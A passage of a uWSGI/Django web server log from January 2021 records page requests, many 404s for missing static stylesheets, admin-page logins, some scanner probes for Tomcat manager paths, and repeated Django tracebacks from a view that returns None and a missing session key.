18965|app: 0|req: 281/381] 117.100.100.38 () {38 vars in 1341 bytes} [Fri Jan 8 15:38:05 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 18965|app: 0|req: 282/382] 117.100.100.38 () {38 vars in 1397 bytes} [Fri Jan 8 15:38:05 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 18965|app: 0|req: 283/383] 117.100.100.38 () {38 vars in 1289 bytes} [Fri Jan 8 15:38:05 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 18965|app: 0|req: 284/384] 117.100.100.38 () {38 vars in 1287 bytes} [Fri Jan 8 15:38:05 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /manager/text/list +[pid: 18965|app: 0|req: 285/385] 192.241.225.100 () {30 vars in 378 bytes} [Fri Jan 8 15:46:14 2021] GET /manager/text/list => generated 3415 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 286/386] 83.97.20.21 () {26 vars in 278 bytes} [Fri Jan 8 15:46:26 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 287/387] 83.97.20.21 () {26 vars in 278 bytes} [Fri Jan 8 15:46:28 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 188, in _get_response + self.check_response(response, callback) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 311, in check_response + "instead." % name +ValueError: The view app01.views.login didn't return an HttpResponse object. It returned None instead. +[pid: 18965|app: 0|req: 288/388] 83.97.20.21 () {22 vars in 227 bytes} [Fri Jan 8 15:46:34 2021] OPTIONS / => generated 52541 bytes in 27 msecs (HTTP/1.0 500) 6 headers in 186 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 289/389] 117.100.100.38 () {38 vars in 1307 bytes} [Fri Jan 8 16:04:17 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 290/390] 117.100.100.38 () {40 vars in 1365 bytes} [Fri Jan 8 16:05:26 2021] GET /my-admin/ => generated 5354 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 291/391] 117.100.100.38 () {48 vars in 1473 bytes} [Fri Jan 8 16:05:34 2021] POST /my-admin/ => generated 27 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 292/392] 117.100.100.38 () {40 vars in 1379 bytes} [Fri Jan 8 16:05:34 2021] GET /admin-home/ => generated 8036 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 18965|app: 0|req: 293/393] 117.100.100.38 () {38 vars in 1334 bytes} [Fri Jan 8 16:05:34 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 18965|app: 0|req: 294/394] 117.100.100.38 () {38 vars in 1346 bytes} [Fri Jan 8 16:05:34 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 18965|app: 0|req: 295/395] 117.100.100.38 () {38 vars in 1338 bytes} [Fri Jan 8 16:05:34 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 18965|app: 0|req: 296/396] 117.100.100.38 () {38 vars in 1302 bytes} [Fri Jan 8 16:05:34 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 18965|app: 0|req: 297/397] 117.100.100.38 () {38 vars in 1322 bytes} [Fri Jan 8 16:05:34 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 18965|app: 0|req: 298/398] 117.100.100.38 () {38 vars in 1322 bytes} [Fri Jan 8 16:05:34 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 18965|app: 0|req: 299/399] 117.100.100.38 () {38 vars in 1378 bytes} [Fri Jan 8 16:05:35 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 18965|app: 0|req: 300/400] 117.100.100.38 () {38 vars in 1270 bytes} [Fri Jan 8 16:05:35 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 18965|app: 0|req: 301/401] 117.100.100.38 () {38 vars in 1268 bytes} [Fri Jan 8 16:05:35 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 302/402] 117.100.100.38 () {40 vars in 1366 bytes} [Fri Jan 8 16:05:36 2021] GET /my-admin/ => generated 5354 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 303/403] 117.100.100.38 () {40 vars in 1369 bytes} [Fri Jan 8 16:05:39 2021] GET /login/ => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 304/404] 117.100.100.38 () {48 vars in 1464 bytes} [Fri Jan 8 16:06:05 2021] POST /login/ => generated 82 bytes in 3 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 305/405] 117.100.100.38 () {40 vars in 1337 bytes} [Fri Jan 8 16:06:13 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 306/406] 93.136.9.223 () {28 vars in 402 bytes} [Fri Jan 8 16:12:28 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 307/407] 109.245.241.93 () {28 vars in 404 bytes} [Fri Jan 8 16:15:55 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 308/408] 83.97.20.21 () {26 vars in 278 bytes} [Fri Jan 8 16:36:35 2021] GET / => generated 6416 bytes in 2 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 309/409] 117.100.100.38 () {42 vars in 1417 bytes} [Fri Jan 8 16:45:18 2021] GET /kind-manage/ => generated 10151 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 18965|app: 0|req: 310/410] 117.100.100.38 () {38 vars in 1336 bytes} [Fri Jan 8 16:45:18 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 18965|app: 0|req: 311/411] 117.100.100.38 () {38 vars in 1304 bytes} [Fri Jan 8 16:45:18 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 18965|app: 0|req: 312/412] 117.100.100.38 () {38 vars in 1348 bytes} [Fri Jan 8 16:45:18 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 18965|app: 0|req: 313/413] 117.100.100.38 () {38 vars in 1340 bytes} [Fri Jan 8 16:45:18 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 18965|app: 0|req: 314/414] 117.100.100.38 () {38 vars in 1324 bytes} [Fri Jan 8 16:45:18 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 18965|app: 0|req: 315/415] 117.100.100.38 () {38 vars in 1324 bytes} [Fri Jan 8 16:45:18 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 18965|app: 0|req: 316/416] 117.100.100.38 () {38 vars in 1380 bytes} [Fri Jan 8 16:45:18 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 18965|app: 0|req: 317/417] 117.100.100.38 () {38 vars in 1272 bytes} [Fri Jan 8 16:45:18 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 18965|app: 0|req: 318/418] 117.100.100.38 () {38 vars in 1270 bytes} [Fri Jan 8 16:45:18 2021] GET /static/css/animate.css => generated 3430 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 319/419] 117.100.100.38 () {40 vars in 1387 bytes} [Fri Jan 8 16:45:19 2021] GET /announcement/ => generated 7409 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 18965|app: 0|req: 320/420] 117.100.100.38 () {38 vars in 1349 bytes} [Fri Jan 8 16:45:19 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 18965|app: 0|req: 321/421] 117.100.100.38 () {38 vars in 1341 bytes} [Fri Jan 8 16:45:19 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 18965|app: 0|req: 322/422] 117.100.100.38 () {38 vars in 1337 bytes} [Fri Jan 8 16:45:19 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 18965|app: 0|req: 323/423] 117.100.100.38 () {38 vars in 1325 bytes} [Fri Jan 8 16:45:19 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 18965|app: 0|req: 324/424] 117.100.100.38 () {38 vars in 1325 bytes} [Fri Jan 8 16:45:19 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 18965|app: 0|req: 325/425] 117.100.100.38 () {38 vars in 1305 bytes} [Fri Jan 8 16:45:19 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 18965|app: 0|req: 326/426] 117.100.100.38 () {38 vars in 1381 bytes} [Fri Jan 8 16:45:19 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 18965|app: 0|req: 327/427] 117.100.100.38 () {38 vars in 1273 bytes} [Fri Jan 8 16:45:19 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 18965|app: 0|req: 328/428] 117.100.100.38 () {38 vars in 1271 bytes} [Fri Jan 8 16:45:19 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 329/429] 117.100.100.38 () {40 vars in 1384 bytes} [Fri Jan 8 16:45:20 2021] GET /admin-home/ => generated 8036 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 18965|app: 0|req: 330/430] 117.100.100.38 () {38 vars in 1335 bytes} [Fri Jan 8 16:45:20 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 18965|app: 0|req: 331/431] 117.100.100.38 () {38 vars in 1347 bytes} [Fri Jan 8 16:45:20 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 18965|app: 0|req: 332/432] 117.100.100.38 () {38 vars in 1323 bytes} [Fri Jan 8 16:45:20 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 18965|app: 0|req: 333/433] 117.100.100.38 () {38 vars in 1339 bytes} [Fri Jan 8 16:45:20 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 18965|app: 0|req: 334/434] 117.100.100.38 () {38 vars in 1303 bytes} [Fri Jan 8 16:45:20 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 18965|app: 0|req: 335/435] 117.100.100.38 () {38 vars in 1323 bytes} [Fri Jan 8 16:45:20 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 18965|app: 0|req: 336/436] 117.100.100.38 () {38 vars in 1271 bytes} [Fri Jan 8 16:45:20 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 18965|app: 0|req: 337/437] 117.100.100.38 () {38 vars in 1379 bytes} [Fri Jan 8 16:45:20 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 18965|app: 0|req: 338/438] 117.100.100.38 () {38 vars in 1269 bytes} [Fri Jan 8 16:45:20 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 339/439] 117.100.100.38 () {40 vars in 1331 bytes} [Fri Jan 8 16:45:34 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /manager/html +[pid: 18965|app: 0|req: 340/440] 192.241.194.160 () {30 vars in 368 bytes} [Fri Jan 8 16:57:56 2021] GET /manager/html => generated 3400 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 341/441] 42.236.10.75 () {34 vars in 797 bytes} [Fri Jan 8 17:17:57 2021] GET /my-admin => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 342/442] 42.236.10.75 () {40 vars in 883 bytes} [Fri Jan 8 17:17:58 2021] GET /my-admin => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 343/443] 42.236.10.84 () {38 vars in 852 bytes} [Fri Jan 8 17:17:58 2021] GET /my-admin/ => generated 5354 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: -1|req: -1/444] 42.236.10.84 () {40 vars in 919 bytes} [Fri Jan 8 17:17:59 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/445] 42.236.10.75 () {40 vars in 942 bytes} [Fri Jan 8 17:17:59 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/446] 42.236.10.93 () {40 vars in 922 bytes} [Fri Jan 8 17:17:59 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/447] 42.236.10.78 () {40 vars in 924 bytes} [Fri Jan 8 17:17:59 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/448] 42.236.10.78 () {40 vars in 928 bytes} [Fri Jan 8 17:17:59 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/449] 42.236.10.93 () {40 vars in 903 bytes} [Fri Jan 8 17:17:59 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/450] 42.236.10.78 () {40 vars in 901 bytes} [Fri Jan 8 17:17:59 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/451] 42.236.10.84 () {40 vars in 917 bytes} [Fri Jan 8 17:17:59 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/452] 42.236.10.78 () {40 vars in 919 bytes} [Fri Jan 8 17:17:59 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/453] 42.236.10.93 () {40 vars in 909 bytes} [Fri Jan 8 17:17:59 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/454] 42.236.10.93 () {40 vars in 960 bytes} [Fri Jan 8 17:18:00 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/455] 42.236.10.84 () {40 vars in 966 bytes} [Fri Jan 8 17:18:00 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: 0|req: 344/456] 42.236.10.78 () {34 vars in 788 bytes} [Fri Jan 8 17:18:11 2021] GET /home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1) +Internal Server Error: /home/ +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 38, in home + response['uid'] = request.session['uid'] + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__ + return self._session[key] +KeyError: 'uid' +[pid: 18965|app: 0|req: 345/457] 42.236.10.78 () {34 vars in 791 bytes} [Fri Jan 8 17:18:12 2021] GET /home/ => generated 57614 bytes in 25 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 346/458] 42.236.10.75 () {40 vars in 875 bytes} [Fri Jan 8 17:18:12 2021] GET /home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0) +Internal Server Error: /home/ +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 38, in home + response['uid'] = request.session['uid'] + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__ + return self._session[key] +KeyError: 'uid' +[pid: 18965|app: 0|req: 347/459] 42.236.10.93 () {38 vars in 843 bytes} [Fri Jan 8 17:18:12 2021] GET /home/ => generated 57878 bytes in 27 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 348/460] 27.115.124.38 () {34 vars in 792 bytes} [Fri Jan 8 17:18:23 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 349/461] 27.115.124.70 () {40 vars in 878 bytes} [Fri Jan 8 17:18:25 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 350/462] 27.115.124.101 () {38 vars in 847 bytes} [Fri Jan 8 17:18:26 2021] GET /login/ => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: -1|req: -1/463] 27.115.124.6 () {28 vars in 445 bytes} [Fri Jan 8 17:18:28 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/464] 27.115.124.6 () {40 vars in 916 bytes} [Fri Jan 8 17:18:28 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/465] 27.115.124.6 () {40 vars in 939 bytes} [Fri Jan 8 17:18:28 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/466] 27.115.124.38 () {40 vars in 926 bytes} [Fri Jan 8 17:18:28 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/467] 27.115.124.70 () {40 vars in 901 bytes} [Fri Jan 8 17:18:28 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/468] 27.115.124.101 () {40 vars in 920 bytes} [Fri Jan 8 17:18:28 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/469] 27.115.124.70 () {40 vars in 922 bytes} [Fri Jan 8 17:18:28 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/470] 27.115.124.101 () {40 vars in 900 bytes} [Fri Jan 8 17:18:29 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/471] 27.115.124.6 () {40 vars in 916 bytes} [Fri Jan 8 17:18:29 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/472] 27.115.124.101 () {40 vars in 916 bytes} [Fri Jan 8 17:18:29 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/473] 27.115.124.6 () {40 vars in 906 bytes} [Fri Jan 8 17:18:29 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: 0|req: 351/474] 180.163.220.3 () {34 vars in 790 bytes} [Fri Jan 8 17:18:31 2021] GET /home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1) +Internal Server Error: /home/ +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 38, in home + response['uid'] = request.session['uid'] + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__ + return self._session[key] +KeyError: 'uid' +[pid: 18965|app: 0|req: 352/475] 180.163.220.67 () {34 vars in 793 bytes} [Fri Jan 8 17:18:32 2021] GET /home/ => generated 57616 bytes in 25 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 353/476] 180.163.220.5 () {40 vars in 876 bytes} [Fri Jan 8 17:18:32 2021] GET /home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0) +Internal Server Error: /home/ +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 38, in home + response['uid'] = request.session['uid'] + File 